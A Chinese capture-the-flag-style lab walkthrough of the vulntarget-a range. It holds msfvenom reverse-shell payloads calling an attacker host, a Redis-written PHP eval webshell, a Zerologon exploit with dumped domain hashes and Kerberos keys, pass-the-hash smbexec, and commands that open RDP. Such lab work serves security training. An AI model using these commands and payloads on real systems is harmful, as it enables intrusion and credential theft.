【靶场实战】vulntarget-a漏洞靶场实战
免责申明
本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
靶场介绍
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
靶场拓扑
以上拓扑图仅做参考,实战中的地址为以下配置:
kali攻击机:192.168.52.128
win11攻击机:192.168.52.1
win7应用服务器:192.168.52.129,10.0.20.98
win16域成员服务器:10.0.20.99,10.0.10.111
win19域控服务器:10.0.10.110
靶场实战
通达漏洞拿下应用服务
思路:主要通过通达OA漏洞拿下应用服务器,也可以通过永恒之蓝漏洞拿到服务器权限,思路差不多
本实战直接采用vulntarget大佬提供的靶场环境。搭建完成服务器后通过扫描win7地址开发端口服务:
服务器开放了80端口,访问后通过判断是通达OA,直接利用工具进行测试
得到shell后直接用蚁剑或者哥斯拉连接
执行命令查看当前网卡,当前为双网卡
ipconfig,如果出现乱码,可以在基本配置中设置编码格式为GB2312
转为CS和MSF上线
为了方便管理会话和后渗透的攻击,建议将会话转移到CS和MSF上
CS上线
上传CS木马到目标服务器
执行木马,获取cs会话
MSF上线
靶场设计第二层是通过redis上线,利用kali工具进行测试
生成反向木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=5555 -f exe > /root/msfshell/5555.exe
使用msf监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LhOST 192.168.52.128
LhOST => 192.168.52.128
msf6 exploit(multi/handler) > set LPORT
LPORT => 4444
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.52.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.52.128:5555
[*] Sending stage (201798 bytes) to 192.168.52.129
[*] Meterpreter session 1 opened (192.168.52.128:5555 -> 192.168.52.129:51972) at 2024-06-18 16:55:10 +0800
在应用服务器win7上利用哥斯拉执行木马,获取msf会话成功
添加路由,设置代理,arp获取到内网同网段IP
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.0.20.0 255.255.255.0 Session 20
192.168.52.0 255.255.255.0 Session 20
添加路由成功后,使用socks_proxy开启一个socks代理服务
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface
to listen on. This must be an addres
s on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 2222 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted:
4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
开启socks代理后需要使用proxychains4,使用前需要配置一下proxychains4
sudo vim /etc/proxychains4.conf
shell命令中使用arp -a查看除了192.168.52.0/24段的地址
发现10.0.20.99地址,利用nmap扫描10.0.20.99,因为只是常用端口扫描,就没有扫描到6379端口
sudo proxychains4 nmap -sT -Pn 10.0.20.99
可以直接扫描redis端口,扫描的时候需要使用root权限,要不然扫描到的状态是过滤
sudo proxychains4 nmap -sT -p 6379 -Pn 10.0.20.99
redis未授权获取服务权限
利用redis未授权以及php web环境来getshell
redis未授权漏洞写webshell
└─$ sudo proxychains4 redis-cli -h 10.0.20.99
[sudo] kali 的密码:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 192.168.52.128:2222 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
写入shell成功后,利用哥斯拉或者蚁剑连接
利用蚁剑连接,先配置代理
我这边直接尝试反向连接,生成反向木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.20.98 LPORT=5555 -f exe -o 123.exe
上传到第二层目标服务器win2016服务上执行
在kali上利用msf监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.20.98
set LPORT 5555
options
执行后就可以获取msf会话
进入shell后执行ipconfig查看网卡
发现10.0.10.111地址
当前权限是administrator权限
拿下域控服务win2019
探测域控服务
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
得到域控IP:10.0.10.110
账号:WIN-UKFQSV1OMUB
域:balsec.com
再次添加路由:
run post/multi/manage/autoroute
查看当前路由信息
测试下是否能够扫描域控主机10.0.10.110,利用nmap扫描
直接域内提权
对域控进行测试漏洞是否存在
sudo proxychains4 python3 zerologon_tester.py win2019 10.0.10.110
出现success,证明漏洞存在
直接利用exp进行攻击
使用zerologon工具将域控密码打成空
(这里打空的用户是域控所在机器的账户,并不是域控账户。)
sudo proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110
获取域控hash,cd到example下:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:839b6abacd6c6bdd814f0ba6fb0f94f9:::
WIN-UKFQSV1OMUB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920
Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63
Administrator:des-cbc-md5:322a836da886d39d
krbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538d
krbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1
krbtgt:des-cbc-md5:7a45ad015d2cba86
WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59a
WIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1
WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0
WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971
WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333
WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37
[*] Cleaning up...
直接就拿下域控
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
开启3389远程桌面
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
直接3389登录:proxychains4 rdesktop 10.0.10.110
账号:balsec.com\administrator 密码:Admin@666